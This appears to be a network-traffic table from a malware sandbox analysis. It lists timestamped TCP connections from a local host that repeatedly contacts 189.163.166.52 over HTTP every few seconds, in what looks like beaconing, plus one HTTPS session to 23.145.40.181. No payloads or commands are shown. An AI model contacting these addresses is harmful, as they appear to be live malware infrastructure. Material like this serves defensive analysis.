                                                                                                                        Nov 30, 2024 11:13:25.453447104 CET4982880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:25.453610897 CET4982880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:25.453622103 CET4982880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:25.573756933 CET8049828189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:25.573811054 CET8049828189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:27.262444973 CET8049828189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:27.267971992 CET8049828189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:27.270541906 CET4982880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:27.270606041 CET4982880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:27.274652004 CET4983480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:27.390757084 CET8049828189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:27.394556999 CET8049834189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:27.394622087 CET4983480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:27.394815922 CET4983480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:27.394829035 CET4983480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:27.514995098 CET8049834189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:27.515011072 CET8049834189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:29.204399109 CET8049834189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:29.204462051 CET8049834189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:29.204840899 CET4983480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:29.204891920 CET4983480192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:29.208331108 CET4984080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:29.325155973 CET8049834189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:29.328253984 CET8049840189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:29.328340054 CET4984080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:29.328526020 CET4984080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:29.328557014 CET4984080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:29.448401928 CET8049840189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:29.448518038 CET8049840189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:31.076697111 CET8049840189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:31.076710939 CET8049840189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:31.076893091 CET4984080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:31.082050085 CET4984080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:31.117103100 CET4984280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:31.202124119 CET8049840189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:31.237075090 CET8049842189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:31.237195015 CET4984280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:31.237323999 CET4984280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:31.237354040 CET4984280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:31.357218981 CET8049842189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:31.357250929 CET8049842189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:33.046477079 CET8049842189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:33.046586037 CET8049842189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:33.046648979 CET4984280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:33.049777985 CET4984280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:33.069211006 CET4984780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:33.169724941 CET8049842189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:33.189162016 CET8049847189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:33.189308882 CET4984780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:33.190927982 CET4984780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:33.191423893 CET4984780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:33.310832977 CET8049847189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:33.311260939 CET8049847189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:34.992533922 CET8049847189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:34.998097897 CET8049847189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:34.998162031 CET4984780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:34.998189926 CET4984780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:35.002702951 CET4985380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:35.118506908 CET8049847189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:35.122852087 CET8049853189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:35.122921944 CET4985380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:35.123045921 CET4985380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:35.123065948 CET4985380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:35.243290901 CET8049853189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:35.243300915 CET8049853189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:36.925482988 CET8049853189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:36.925565958 CET8049853189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:36.925631046 CET4985380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:36.925756931 CET4985380192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:36.936717033 CET4985980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:37.048157930 CET8049853189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:37.060597897 CET8049859189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:37.060755968 CET4985980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:37.061934948 CET4985980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:37.062011957 CET4985980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:37.181859970 CET8049859189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:37.181925058 CET8049859189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:39.051615000 CET8049859189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:39.051630974 CET8049859189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:39.051723003 CET4985980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:39.052114964 CET4985980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:39.071980000 CET4986580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:39.172099113 CET8049859189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:39.191998005 CET8049865189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:39.192066908 CET4986580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:39.192209005 CET4986580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:39.192223072 CET4986580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:39.313098907 CET8049865189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:39.313483000 CET8049865189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:41.033102989 CET8049865189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:41.033148050 CET8049865189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:41.033200979 CET4986580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:41.033334017 CET4986580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:41.037738085 CET4986980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:41.153423071 CET8049865189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:41.157671928 CET8049869189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:41.157762051 CET4986980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:41.157958984 CET4986980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:41.157991886 CET4986980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:41.277848959 CET8049869189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:41.277909994 CET8049869189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:42.994563103 CET8049869189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:42.994646072 CET8049869189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:42.994728088 CET4986980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:42.994843960 CET4986980192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:42.999183893 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:42.999212980 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:42.999284983 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:42.999620914 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:42.999634981 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:43.114943981 CET8049869189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:44.395034075 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:44.395104885 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:44.396581888 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:44.396590948 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:44.396817923 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:44.466403008 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:44.507338047 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:44.904937029 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:44.904957056 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:44.904963970 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:44.904992104 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:44.905039072 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:44.905072927 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:44.905088902 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.069667101 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.105983973 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.105992079 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.106019020 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.106051922 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.106084108 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.127209902 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.127218962 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.127249956 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.127279043 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.127320051 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.152353048 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.152360916 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.152384043 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.152435064 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.152461052 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.181938887 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.181946993 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.181968927 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.182010889 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.182025909 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.307254076 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.307260990 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.307352066 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.318859100 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.318866968 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.318932056 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.337935925 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.337948084 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.338020086 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.352530956 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.352539062 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.352611065 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.363850117 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.363857985 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.363936901 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.377230883 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.377341032 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.387007952 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.387072086 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.509632111 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.509728909 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.518107891 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.518201113 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.525870085 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.525959969 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.533555984 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.533633947 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.543673038 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.543765068 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.551388979 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.551462889 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.559123993 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.559200048 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.566880941 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.566956997 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.577050924 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.577131987 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.584661007 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.584755898 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.593556881 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.593641996 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.601476908 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.601546049 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.606430054 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.606493950 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.606523991 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.606550932 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.612706900 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.612726927 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.612740040 CET49875443192.168.2.423.145.40.181
                                                                                                                        Nov 30, 2024 11:13:45.612746954 CET4434987523.145.40.181192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.689131975 CET4988180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:45.809137106 CET8049881189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.809245110 CET4988180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:45.809374094 CET4988180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:45.809393883 CET4988180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:45.929372072 CET8049881189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:45.929387093 CET8049881189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:47.602294922 CET8049881189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:47.602447987 CET8049881189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:47.602499962 CET4988180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:47.602538109 CET4988180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:47.609795094 CET4988780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:47.722481966 CET8049881189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:47.729754925 CET8049887189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:47.729823112 CET4988780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:47.730003119 CET4988780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:47.730045080 CET4988780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:47.849956036 CET8049887189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:47.849994898 CET8049887189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:49.522645950 CET8049887189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:49.522849083 CET8049887189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:49.522919893 CET4988780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:49.523132086 CET4988780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:49.542083025 CET4989080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:49.642961025 CET8049887189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:49.662313938 CET8049890189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:49.662581921 CET4989080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:49.662631989 CET4989080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:49.662646055 CET4989080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:49.782804966 CET8049890189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:49.782815933 CET8049890189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:51.422012091 CET8049890189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:51.427697897 CET8049890189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:51.429121017 CET4989080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:51.429121017 CET4989080192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:51.436868906 CET4989680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:51.549068928 CET8049890189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:51.556869030 CET8049896189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:51.556941986 CET4989680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:51.558331013 CET4989680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:51.558353901 CET4989680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:51.678440094 CET8049896189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:51.678498030 CET8049896189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:53.395775080 CET8049896189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:53.395889044 CET8049896189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:53.395941019 CET4989680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:53.396045923 CET4989680192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:53.424197912 CET4990280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:53.515949965 CET8049896189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:53.544214010 CET8049902189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:53.544353962 CET4990280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:53.544500113 CET4990280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:53.544539928 CET4990280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:53.664407969 CET8049902189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:53.664509058 CET8049902189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:55.339034081 CET8049902189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:55.344430923 CET8049902189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:55.345805883 CET4990280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:55.345805883 CET4990280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:55.349319935 CET4990880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:55.465792894 CET8049902189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:55.469377041 CET8049908189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:55.469580889 CET4990880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:55.469620943 CET4990880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:55.469635963 CET4990880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:55.589540958 CET8049908189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:55.589567900 CET8049908189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:57.270198107 CET8049908189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:57.270549059 CET8049908189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:57.270617962 CET4990880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:57.326015949 CET4990880192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:57.443669081 CET4991280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:57.448033094 CET8049908189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:57.565768003 CET8049912189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:57.565831900 CET4991280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:57.566004038 CET4991280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:57.566135883 CET4991280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:57.686988115 CET8049912189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:57.687486887 CET8049912189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:59.350991964 CET8049912189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:59.357084990 CET8049912189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:59.357155085 CET4991280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:59.357687950 CET4991280192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:59.381295919 CET4991580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:59.477587938 CET8049912189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:59.501455069 CET8049915189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:59.501543999 CET4991580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:59.501769066 CET4991580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:59.501805067 CET4991580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:13:59.621680975 CET8049915189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:13:59.621706963 CET8049915189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:01.340970039 CET8049915189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:01.341001034 CET8049915189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:01.341053009 CET4991580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:01.341243029 CET4991580192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:01.346306086 CET4992180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:01.461103916 CET8049915189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:01.467358112 CET8049921189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:01.467824936 CET4992180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:01.467909098 CET4992180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:01.467921019 CET4992180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:01.589167118 CET8049921189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:01.589180946 CET8049921189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:03.218429089 CET8049921189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:03.218518019 CET8049921189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:03.218591928 CET4992180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:03.218740940 CET4992180192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:03.225835085 CET4992780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:03.338684082 CET8049921189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:03.345861912 CET8049927189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:03.345951080 CET4992780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:03.346157074 CET4992780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:03.346194983 CET4992780192.168.2.4189.163.166.52
                                                                                                                        Nov 30, 2024 11:14:03.466226101 CET8049927189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:03.466249943 CET8049927189.163.166.52192.168.2.4
                                                                                                                        Nov 30, 2024 11:14:05.094419003 CET8049927189.163.166.52192.168.2.4
